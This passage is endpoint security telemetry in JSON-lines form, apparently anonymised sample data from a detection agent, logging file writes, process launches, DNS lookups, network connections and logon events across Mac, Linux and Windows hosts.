+{"event_simpleName":"TarFileWritten","ContextTimeStamp":"1625677353.633","ConfigStateHash":"3090255842","ContextProcessId":"365049009681176519","ContextThreadId":"0","aip":"67.43.156.14","FileIdentifier":"050000010000000000000000000000005749420100000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"TarFileWrittenMacV1","id":"ffffffff-1111-11eb-9497-028a0bfcf603","EffectiveTransmissionClass":"2","aid":"ffffffffe6244708bd09a6c111f63f4a","timestamp":"1625677353895","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user7/.rbenv/versions/2.6.6/lib/ruby/gems/2.6.0/cache/database_cleaner-1.8.5.gem"} +{"event_simpleName":"AgentConnect","ConfigStateHash":"3967242894","NetworkContainmentState":"0","VerifiedCertificate":"7431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf","aip":"67.43.156.14","ConfigIDBase":"65994753","FailedConnectCount":"404","ConnectType":"1","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","ConfigurationVersion":"10","Entitlements":"15","name":"AgentConnectMacV5","ConfigIDPlatform":"4","PreviousConnectTime":"1625673963.331","id":"ffffffff-1111-11eb-ba54-02a3616f6acd","ConfigIDBuild":"13701","ConnectTime":"1625677350.208","EffectiveTransmissionClass":"2","aid":"ffffffff2977460db2898ece881a9358","ProvisionState":"0","timestamp":"1625677350466","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"LFODownloadConfirmation","ConfigStateHash":"3090255842","aip":"67.43.156.14","DownloadServer":"lfodown01-b.cloudsink.net","DownloadPath":"metahash+/cfs/channelfiles/0000000503/66d5e9ea15754bcfb5f9152ec7ac90ac/C-00000503-00000000-00000001.sys","DownloadPort":"443","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"LFODownloadConfirmationMacV1","CompletionEventId":"Event_ChannelDataDownloadCompleteMacV1","id":"ffffffff-1111-11eb-8b09-069ee8920171","EffectiveTransmissionClass":"0","aid":"ffffffff5e8b4724aa10088c4f71cd9a","timestamp":"1625677525235","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"C-00000503-00000000-00000001.sys"} +{"event_simpleName":"AsepFileChange","ContextTimeStamp":"1625677482.148","ConfigStateHash":"1620585913","ContextProcessId":"364936256754041721","ContextThreadId":"0","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"AsepFileChangeMacV1","id":"ffffffff-1111-11eb-9e50-064be6e56df7","EffectiveTransmissionClass":"2","aid":"fffffffff1a64286a233d09974b1b377","timestamp":"1625677482403","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/System/Library/AssetsV2/com_apple_MobileAsset_MacSoftwareUpdate/5968e4faeba359dd5270ac282340cc4bd94d348c.asset/AssetData/payloadv2/ecc_data/System/Library/Spotlight/SystemPrefs.mdimporter/Contents/MacOS/SystemPrefs","VnodeModificationType":"6"} +{"event_simpleName":"TerminateProcess","RawProcessId":"76482","ContextTimeStamp":"1625677510.959","ConfigStateHash":"1284133626","ContextProcessId":"130732827553316","ContextThreadId":"0","aip":"67.43.156.14","ConfigBuild":"1007.8.0010912.1","event_platform":"Lin","TargetProcessId":"130732827553316","Entitlements":"15","name":"TerminateProcessLinV2","id":"ffffffff-1111-11eb-97d0-02b2813216eb","EffectiveTransmissionClass":"2","aid":"ffffffffdd094539a02b394c69a70aaf","timestamp":"1625677511067","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"ConfigBuild":"1007.4.0013701.1","event_simpleName":"FirewallEnabled","event_platform":"Mac","ConfigStateHash":"3090255842","Entitlements":"15","name":"FirewallEnabledMacV1","aip":"67.43.156.14","id":"ffffffff-1111-11eb-a9e6-067d21325a03","EffectiveTransmissionClass":"2","aid":"ffffffff70cf4070af024397f25007c7","timestamp":"1625677372544","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"FsVolumeUnmounted","VolumeName":"Install Google Drive","ContextTimeStamp":"1625677332.283","ConfigStateHash":"3090255842","aip":"67.43.156.14","VolumeMediaBSDName":"disk2s2","VolumeMountPoint":"/private/tmp/KSInstallAction.dn6J5Xa1M4/m","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"FsVolumeUnmountedMacV1","id":"ffffffff-1111-11eb-8fd9-06866dcbd3d5","EffectiveTransmissionClass":"2","aid":"ffffffffed984e248973f3ada1eb543d","timestamp":"1625677334451","cid":"ffffffff15754bcfb5f9152ec7ac90ac","VolumeIsNetwork":"0"} +{"LocalAddressIP4":"0.0.0.0","event_simpleName":"NetworkListenIP4","ContextTimeStamp":"1625677474.525","ConfigStateHash":"2300098580","ConnectionFlags":"0","ContextProcessId":"328911864662804336","RemotePort":"0","aip":"67.43.156.14","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"23165","Entitlements":"15","name":"NetworkListenIP4LinV5","id":"ffffffff-1111-11eb-88fd-06a17d0fdc05","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff2a0d484da8f7a9cf8bde7164","RemoteAddressIP4":"0.0.0.0","ConnectionDirection":"2","InContext":"0","timestamp":"1625677474879","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"ELFFileWritten","ContextTimeStamp":"1625677526.828","ConfigStateHash":"1620585913","ContextProcessId":"363122200934575406","Size":"38798952","ContextThreadId":"0","aip":"67.43.156.14","SHA256HashData":"35e590a61d32b72651b0cd23594d04f4671d79a843106136cf6abc324cc19027","FileIdentifier":"040000010000000000000000000000006793f80200000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ELFFileWrittenMacV1","id":"ffffffff-1111-11eb-985c-02152dd35bc1","ELFSubType":"4","EffectiveTransmissionClass":"2","aid":"ffffffff28414c2293e35c360213e723","timestamp":"1625677527114","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/3c/z7j1h7dx3nz3xkl10c1vyxgh0000gp/T/.com.google.Chrome.M2zGjQ/_platform_specific/x86-64/zoom_x86_64.nexe"} +{"MajorVersion":"4","event_simpleName":"OsVersionInfo","OSVersionFileData":"4e414d453d22416d617a6f6e204c696e7578220a56455253494f4e3d2232220a49443d22616d7a6e220a49445f4c494b453d2263656e746f73207268656c206665646f7261220a56455253494f4e5f49443d2232220a5052455454595f4e414d453d22416d617a6f6e204c696e75782032220a414e53495f434f4c4f523d22303b3333220a4350455f4e414d453d226370653a322e333a6f3a616d617a6f6e3a616d617a6f6e5f6c696e75783a32220a484f4d455f55524c3d2268747470733a2f2f616d617a6f6e6c696e75782e636f6d2f220a","BootArgs":"BOOT_IMAGE\u003d/boot/vmlinuz-4.14.232-176.381.amzn2.x86_64 root\u003dUUID\u003d9f548782-8f9f-4dd9-873a-436ea8f3e8a6 ro console\u003dtty0 console\u003dttyS0,115200n8 net.ifnames\u003d0 biosdevname\u003d0 nvme_core.io_timeout\u003d4294967295 rd.emergency\u003dpoweroff rd.shell\u003d0","ConfigStateHash":"3712162471","AgentVersion":"6.19.11611.0","aip":"67.43.156.14","MinorVersion":"14","OSVersionString":"Linux localhost 4.14.232-176.381.amzn2.x86_64 #1 SMP Wed May 19 00:31:54 UTC 2021 x86_64","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","name":"OsVersionInfoLinV4","RFMState":"1","id":"ffffffff-1111-11eb-93d4-0624c36f3a79","OSVersionFileName":"/etc/os-release","aid":"ffffffff2d1245c0a32d5efcf9351272","timestamp":"1625677383466","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"CriticalFileModified","ContextTimeStamp":"1625677439.099","GID":"0","ConfigStateHash":"3090255842","ContextProcessId":"364849347227309005","ContextThreadId":"0","aip":"67.43.156.13","FileIdentifier":"04000001000000000000000000000000cdf3100100000000","ConfigBuild":"1007.4.0013701.1","UID":"0","USN":"89566685","event_platform":"Mac","UnixMode":"384","Entitlements":"15","name":"CriticalFileModifiedMacV2","id":"ffffffff-1111-11eb-9262-0268ab613b49","EffectiveTransmissionClass":"2","aid":"ffffffff761b4a7d9962dd9e7e776044","timestamp":"1625677439398","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/db/dslocal/nodes/Default/users/user9.plist/"} +{"event_simpleName":"NeighborListIP6","ConfigStateHash":"3090255842","NeighborList":"1C-AB-C0-9B-10-A2|2607:fea8:720:1bc8:1eab:c0ff:fe9b:10a2|0|","aip":"67.43.156.14","InterfaceIndex":"6","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"NeighborListIP6MacV1","id":"ffffffff-1111-11eb-ac8a-06b5e1186139","EffectiveTransmissionClass":"3","aid":"ffffffff01c7450180352a7c58a28fb4","timestamp":"1625677489786","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"NewScriptWritten","ContextTimeStamp":"1625677382.785","UserName":"user3","ConfigStateHash":"1325353086","ContextProcessId":"364952259879648742","Size":"8052","ContextThreadId":"0","aip":"67.43.156.14","SHA256HashData":"359fd6e9a46f605d491225325125502ca6ba99a73ac3141f59af96627f128fc6","FileIdentifier":"04000001000000000000000000000000ef07570000000000","ConfigBuild":"1007.4.0013806.1","event_platform":"Mac","IsOnRemovableDisk":"0","Entitlements":"15","name":"NewScriptWrittenMacV3","id":"ffffffff-1111-11eb-9dc1-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffffcebd42c0890d59b54279d3d3","timestamp":"1625677383057","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user3/git/it_eng_scripts/depnotify_starter/dep_notify_starter.sh"} +{"event_simpleName":"SystemCapacity","ConfigStateHash":"1620585913","aip":"67.43.156.13","CpuClockSpeed":"2400000000","PhysicalCoreCount":"8","CpuFeaturesMask":"7494065083908067","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LogicalCoreCount":"16","Entitlements":"15","name":"SystemCapacityMacV1","CpuVendor":"0","CpuProcessorName":"Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz","id":"ffffffff-1111-11eb-b714-066001392751","CpuSignature":"591597","EffectiveTransmissionClass":"3","aid":"fffffffff2c7432859ff6bbe1a0bd6af","ProcessorPackageCount":"1","MemoryTotal":"17179869184","timestamp":"1625677387216","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"FirmwareAnalysisStatus","ConfigStateHash":"3090255842","FirmwareAnalysisEclControlInterfaceVersion":"0","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","FirmwareAnalysisEclConsumerInterfaceVersion":"0","BootTimeFunctionalityLevel":"255","ReasonOfFunctionalityLevel":"3","CurrentFunctionalityLevel":"2","Entitlements":"15","name":"FirmwareAnalysisStatusMacV2","id":"ffffffff-1111-11eb-ba57-0214a0d89bf7","EffectiveTransmissionClass":"0","aid":"ffffffff0d7b4d839912e55b4755e85b","timestamp":"1625677368429","cid":"ffffffff15754bcfb5f9152ec7ac90ac","PciAttachmentState":"65535"} +{"OutOctets":"0","CreationTimeStamp":"","aip":"67.43.156.13","OutMulticastPkts":"0","InErrors":"0","InterfaceAlias":"utun2","InDiscards":"0","InterfaceIndex":"17","event_platform":"Mac","InterfaceType":"1","id":"ffffffff-1111-11eb-a272-0294ad12fbe7","PhysicalAddressLength":"0","InUcastPkts":"0","EffectiveTransmissionClass":"2","timestamp":"1625677504544","LocalAddressIP4":"67.43.156.14","event_simpleName":"LocalIpAddressIP4","ConfigStateHash":"3090255842","PhysicalAddress":"","OutErrors":"0","InUnknownProtos":"0","OutUcastPkts":"0","InMulticastPkts":"0","ConfigBuild":"1007.4.0013701.1","InOctets":"0","NetLuidIndex":"2","Entitlements":"15","name":"LocalIpAddressIP4MacV1","aid":"ffffffff557f4b99a0afdea9ce8cd6fa","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"CommandLine":"uname -a","ConfigBuild":"1007.8.0009806.1","ConfigStateHash":"4288861242","Entitlements":"15","GID":"0","ImageFileName":"/bin/uname","MD5HashData":"894356eb59e279696c304f07091b7fde","NDRoot":"321385814512398584","ParentProcessId":"321385814512398584","ProcessEndTime":"1604855099.126","ProcessGroupId":"0","ProcessStartTime":"1604855099.126","RGID":"0","RUID":"0","RawProcessId":"51342","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"de80fe0bd06a96543aaec5c634b08cbfc58dba88ea3a66871434a0dd3a9e9dfa","SVGID":"0","SVUID":"0","SessionProcessId":"314116638974342642","SourceProcessId":"321385814512398584","SourceThreadId":"0","TargetProcessId":"321385814512398605","UID":"0","aid":"ffffffff70d140ca9ba97f0dddd14137","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Lin","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-ac87-06decddc17a1","name":"ProcessRollup2LinV5","timestamp":"1604855099681"} +{"AsepWrittenCount":"0","ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1789338890","ContextProcessId":"317713210176499254","ContextThreadId":"0","ContextTimeStamp":"1604855096.730","DirectoryCreatedCount":"0","DnsRequestCount":"0","Entitlements":"15","ExecutableDeletedCount":"0","FileDeletedCount":"0","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkListenCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","RawProcessId":"28987","SHA256HashData":"6de76ab470a16b2a825d223b996d994623473c694c60fccbb71af8691e61c5e0","SuspectStackCount":"0","SuspiciousDnsRequestCount":"0","TargetProcessId":"317713210176499254","aid":"ffffffff75fc48f15cfe5f095e605c4c","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-809e-02fff4e55a49","name":"EndOfProcessMacV14","timestamp":"1604855099646"} +{"AllocateVirtualMemoryCount":"0","ArchiveFileWrittenCount":"0","AsepWrittenCount":"0","BinaryExecutableWrittenCount":"0","CLICreationCount":"0","ConHostId":"38188","ConHostProcessId":"3099352216141","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3343111420","ContextData":"","ContextProcessId":"3100508103359","ContextThreadId":"93436292950223","ContextTimeStamp":"1604855097.926","CreateProcessCount":"0","CycleTime":"2937514388","DirectoryCreatedCount":"0","DirectoryEnumeratedCount":"1","DnsRequestCount":"0","DocumentFileWrittenCount":"0","EffectiveTransmissionClass":"3","Entitlements":"15","ExeAndServiceCount":"0","ExecutableDeletedCount":"0","ExitCode":"0","FileDeletedCount":"2","GenericFileWrittenCount":"0","ImageSubsystem":"3","InjectedDllCount":"0","InjectedThreadCount":"0","KernelTime":"7500000","MaxThreadCount":"4","ModuleLoadCount":"38","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkConnectCountUdp":"0","NetworkListenCount":"0","NetworkModuleLoadCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","ParentProcessId":"3099350649383","PrivilegedProcessHandleCount":"0","ProcessStartTime":"1604855096.463","ProtectVirtualMemoryCount":"0","QueueApcCount":"0","RawProcessId":"33016","RegKeySecurityDecreasedCount":"0","RemovableDiskFileWrittenCount":"0","RunDllInvocationCount":"0","SHA256HashData":"faceb6f5d1cdc5ad50a4a1b92c4cd3fcdabcf7e8d418014a1b1221c1defa3d8f","ScreenshotsTakenCount":"0","ScriptEngineInvocationCount":"0","ServiceEventCount":"0","SetThreadContextCount":"0","SnapshotFileOpenCount":"0","SuspectStackCount":"0","SuspiciousCredentialModuleLoadCount":"0","SuspiciousDnsRequestCount":"0","SuspiciousFontLoadCount":"0","SuspiciousRawDiskReadCount":"0","TargetProcessId":"3100508103359","UnsignedModuleLoadCount":"0","UserMemoryAllocateExecutableCount":"0","UserMemoryAllocateExecutableRemoteCount":"0","UserMemoryProtectExecutableCount":"0","UserMemoryProtectExecutableRemoteCount":"0","UserSid":"S-1-5-18","UserTime":"6406250","aid":"ffffffffb5db4b2e7ec89aba537adcc2","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-8726-063418e4a9e7","name":"EndOfProcessV15","timestamp":"1604855099935"} +{"AsepWrittenCount":"0","ConfigBuild":"1007.4.0009304.1","ConfigStateHash":"3344040805","ContextProcessId":"311775981885093125","ContextThreadId":"0","ContextTimeStamp":"1604855101.341","DirectoryCreatedCount":"0","DnsRequestCount":"0","Entitlements":"15","ExecutableDeletedCount":"0","FileDeletedCount":"0","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkListenCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","RawProcessId":"10507","SHA256HashData":"3b00897e1eb587c5f77e3866ff6bdc80f5e70f839543242e0ee5a1581014adc3","SuspectStackCount":"0","SuspiciousDnsRequestCount":"0","TargetProcessId":"311775981885093125","aid":"ffffffff1aa0482a5ea94f64e08e7b15","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-bc03-065126dd0691","name":"EndOfProcessMacV12","timestamp":"1604855100139"} +{"AuthenticationId":"999","CommandLine":"D:\\projects\\splunk-forwarder\\bin\\splunk-powershell.exe --ps2","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3765958535","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume2\\projects\\splunk-forwarder\\bin\\splunk-powershell.exe","ImageSubsystem":"3","IntegrityLevel":"16384","MD5HashData":"571391f723a439e985a2064337e2802a","ParentAuthenticationId":"999","ParentBaseFileName":"splunkd.exe","ParentProcessId":"17346335177","ProcessCreateFlags":"67634688","ProcessEndTime":"","ProcessParameterFlags":"24577","ProcessStartTime":"1604855099.406","ProcessSxsFlags":"64","RawProcessId":"6116","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"7f326aad0ee45bfef93daede5597d70422d472084ae3295762654fb5021a8720","SessionId":"0","SourceProcessId":"17346335177","SourceThreadId":"107650023406","Tags":"27, 151, 12094627905582, 12094627906234","TargetProcessId":"583707537390","TokenType":"1","UserSid":"S-1-5-18","WindowFlags":"384","aid":"ffffffff3a5a424fa02450da53619745","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-a09e-06f79d630255","name":"ProcessRollup2V17","timestamp":"1604855100030"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"2784638081","ContextProcessId":"259090530891","ContextThreadId":"16409623709004","ContextTimeStamp":"1604855095.961","DnsRequestCount":"1","DomainName":"comp1.dom2","DualRequest":"0","EffectiveTransmissionClass":"3","Entitlements":"15","InterfaceIndex":"0","RequestType":"1","aid":"ffffffff4f1444bab96568879cb43556","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"DnsRequest","id":"ffffffff-1111-11eb-8077-0606f7dcf2ed","name":"DnsRequestV3","timestamp":"1604855099913"} +{"ConfigBuild":"1007.8.0009806.1","ConfigStateHash":"4288861242","ContextProcessId":"321385820045701199","ContextThreadId":"0","ContextTimeStamp":"1604855101.645","Entitlements":"15","GID":"0","TargetFileName":"/etc/shadow","UID":"0","UnixMode":"32768","aid":"ffffffff32ba43a483e76c6f0a4aa26f","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Lin","event_simpleName":"CriticalFileAccessed","id":"ffffffff-1111-11eb-b70d-027f9ced2001","name":"CriticalFileAccessedLinV1","timestamp":"1604855102247"} +{"CommandLine":"/usr/bin/plutil -convert xml1 -o - /Applications/Xcode.app/Contents/Developer/Platforms/AppleTVOS.platform/Developer/Library/CoreSimulator/Profiles/Runtimes/tvOS.simruntime/Contents/Resources/RuntimeRoot/System/Library/PrivateFrameworks/DiagnosticExtensions.framework/PlugIns/com.apple.DiagnosticExtensions.CrashLogs.appex/Info.plist","ConfigBuild":"1007.4.0009304.1","ConfigStateHash":"3344040805","Entitlements":"15","GID":"0","ImageFileName":"/usr/bin/plutil","MD5HashData":"d51cef1b288e2032aee9805deff04bfd","MachOSubType":"1","ParentProcessId":"311774817965726568","ProcessEndTime":"","ProcessGroupId":"311774817965726568","ProcessStartTime":"1604855111.240","RGID":"0","RUID":"0","RawProcessId":"10692","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"3b00897e1eb587c5f77e3866ff6bdc80f5e70f839543242e0ee5a1581014adc3","SVGID":"0","SVUID":"0","SourceProcessId":"311776004953765502","SourceThreadId":"0","Tags":"27, 12094627905582, 12094627906234","TargetProcessId":"311776004953765502","UID":"0","aid":"ffffffff1aa0482a5ea94f64e08e7b15","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-bc03-065126dd0691","name":"ProcessRollup2MacV3","timestamp":"1604855109180"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3899738370","ContextProcessId":"1546527409909","ContextThreadId":"4711690090889","ContextTimeStamp":"1604855114.133","DesiredAccess":"1180054","EffectiveTransmissionClass":"3","Entitlements":"15","FileAttributes":"0","FileIdentifier":"501ee2c32e53fb43b07f419f3236fb45c29e000000002c00","FileObject":"18446655033844205120","Information":"2","IrpFlags":"2180","MajorFunction":"0","MinorFunction":"0","OperationFlags":"0","Options":"88080484","ShareAccess":"1","Status":"0","TargetFileName":"\\Device\\HarddiskVolume4\\Windows\\Temp\\__PSScriptPolicyTest_dvkjnbka.apn.ps1","aid":"ffffffff8f1e4b77b4dae5debaa1c8bc","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NewScriptWritten","id":"ffffffff-1111-11eb-80b5-06e11a66e03d","name":"NewScriptWrittenV7","timestamp":"1604855114427"} +{"ConfigBuild":"1007.4.0012205.1","ConfigStateHash":"1306766522","ConnectionDirection":"1","ConnectionFlags":"0","ContextProcessId":"321275232072440993","ContextTimeStamp":"1604855116.421","Entitlements":"15","InContext":"0","LocalAddressIP4":"0.0.0.0","LocalPort":"0","Protocol":"6","RemoteAddressIP4":"67.43.156.14","RemotePort":"443","aid":"ffffffffd4094240a6b1d12aaf304f4f","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NetworkConnectIP4","id":"ffffffff-1111-11eb-aca9-02683aed2a0d","name":"NetworkConnectIP4MacV5","timestamp":"1604855116502"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"2602391615","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"223442259384","ContextTimeStamp":"1604855116.849","EffectiveTransmissionClass":"3","Entitlements":"15","InContext":"0","LocalAddressIP4":"67.43.156.14","LocalPort":"53961","Protocol":"6","RemoteAddressIP4":"67.43.156.14","RemotePort":"443","aid":"fffffffff000426eb99afaa2ccdcbc17","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NetworkConnectIP4","id":"ffffffff-1111-11eb-b0eb-06be7616c211","name":"NetworkConnectIP4V5","timestamp":"1604855116942"} +{"AuthenticationId":"6580764513","AuthenticationPackage":"Negotiate","ClientComputerName":"-","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3011122681","ContextProcessId":"816054990879","ContextThreadId":"52913017705957","ContextTimeStamp":"1604855091.781","EffectiveTransmissionClass":"2","Entitlements":"15","LogonDomain":"NT AUTHORITY","LogonServer":"","LogonTime":"1604855091.781","LogonType":"9","PasswordLastSet":"","RemoteAccount":"1","UserFlags":"0","UserIsAdmin":"0","UserLogonFlags":"12","UserName":"SYSTEM","UserPrincipal":"user4@dom2","UserSid":"S-1-5-18","aid":"ffffffff8d2e4b4f9b21b40633a8d579","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserLogon","id":"ffffffff-1111-11eb-a8cf-0649c95cfa1d","name":"UserLogonV8","timestamp":"1604855121077"} +{"AuthenticationId":"2007206396","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3011122681","ContextProcessId":"4415814628770","ContextThreadId":"41392001729898","ContextTimeStamp":"1604855120.785","DiskParentDeviceInstanceId":"PCI\\VEN_1000\u0026DEV_0054\u0026SUBSYS_197615AD\u0026REV_01\\4\u00261f16fef7\u00260\u002600A8","EffectiveTransmissionClass":"3","Entitlements":"15","FileEcpBitmask":"0","FileIdentifier":"b57cb59769dfe71180b4806e6f6e6963ea8902000000cb2c","FileObject":"18446708893089967904","IrpFlags":"1028","IsOnNetwork":"0","IsOnRemovableDisk":"0","IsTransactedFile":"0","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","SHA256HashData":"d0e1b81f3f3f18256f6447703624019eaee9b1068b3f09323eced4f547cc4182","Size":"6144","TargetFileName":"\\Device\\HarddiskVolume2\\Users\\user10\\AppData\\Local\\Temp\\ec1ijefl.dll","TokenType":"1","aid":"ffffffff2c47454cba360bc404a607bb","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"PeFileWritten","id":"ffffffff-1111-11eb-b091-06f6cca0a049","name":"PeFileWrittenV14","timestamp":"1604855121109"} +{"AuthenticationId":"317005428","AuthenticationPackage":"Negotiate","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3950066843","EffectiveTransmissionClass":"2","Entitlements":"15","LogoffTime":"1604855132.756","LogonDomain":"dom1","LogonServer":"srv2","LogonTime":"1604855131.666","LogonType":"7","PasswordLastSet":"1598119332.510","RemoteAccount":"1","UserFlags":"32","UserIsAdmin":"0","UserLogoffType":"3","UserLogonFlags":"0","UserName":"user4","UserPrincipal":"user.name@dom2.com","UserSid":"S-1-5-21-606747145-1364589140-725345543-28636","aid":"ffffffffe0104823bd3de859d5bc8bc7","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserLogoff","id":"ffffffff-1111-11eb-8913-0287fd11c79b","name":"UserLogoffV3","timestamp":"1604855134461"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"537307300","ContextProcessId":"635780922149","ContextThreadId":"9479299143023","ContextTimeStamp":"1604855025.966","DesiredAccess":"1180054","EffectiveTransmissionClass":"3","Entitlements":"15","FileAttributes":"128","FileIdentifier":"0e02a8c7ed9d244887cef0409af0e6190030000000001100","FileObject":"18446695174291796544","Information":"2","IrpFlags":"2180","MajorFunction":"0","MinorFunction":"0","OperationFlags":"0","Options":"83886176","ShareAccess":"3","Status":"0","TargetFileName":"\\Device\\HarddiskVolume4\\Program Files\\Snow Software\\Inventory\\Agent\\cloudmeteringhost.exe","aid":"ffffffff425942f58382dbb11350eeda","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NewExecutableWritten","id":"ffffffff-1111-11eb-93cb-067deb43537b","name":"NewExecutableWrittenV1","timestamp":"1604855149643"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3765958535","ConnectionDirection":"2","ConnectionFlags":"0","ContextProcessId":"50714198593318","ContextThreadId":"194302491825207","ContextTimeStamp":"1604855150.066","EffectiveTransmissionClass":"3","Entitlements":"15","InContext":"0","LocalAddressIP4":"127.0.0.1","LocalPort":"59491","Protocol":"6","RemoteAddressIP4":"0.0.0.0","RemotePort":"0","aid":"ffffffffa51b4acf9dbc1fc273e6145c","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NetworkListenIP4","id":"ffffffff-1111-11eb-8726-063418e4a9e7","name":"NetworkListenIP4V5","timestamp":"1604855150545"} +{"ClientComputerName":"com1","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3011122681","ContextProcessId":"7073822473144","ContextThreadId":"48689911139327","ContextTimeStamp":"1604855152.993","EffectiveTransmissionClass":"2","Entitlements":"15","EtwRawProcessId":"744","EtwRawThreadId":"5304","LogonDomain":"BROADCAST","LogonType":"3","RemoteAddressIP4":"67.43.156.14","Status":"3221225581","SubStatus":"3221225578","UserName":"user5","aid":"ffffffffd8844a59acce5e1f4ad01888","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserLogonFailed2","id":"ffffffff-1111-11eb-a8aa-067029dffccb","name":"UserLogonFailed2V2","timestamp":"1604855154274"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3343111420","ContextProcessId":"1838383212125","ContextThreadId":"27242382481217","ContextTimeStamp":"1604855151.534","EffectiveTransmissionClass":"3","Entitlements":"15","FileIdentifier":"b0754a8f86feffffb0754a8f86feffff09764a8f86feffff","FileObject":"18446636884348143072","IrpFlags":"1028","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","TargetFileName":"\\Device\\HarddiskVolume3\\Program 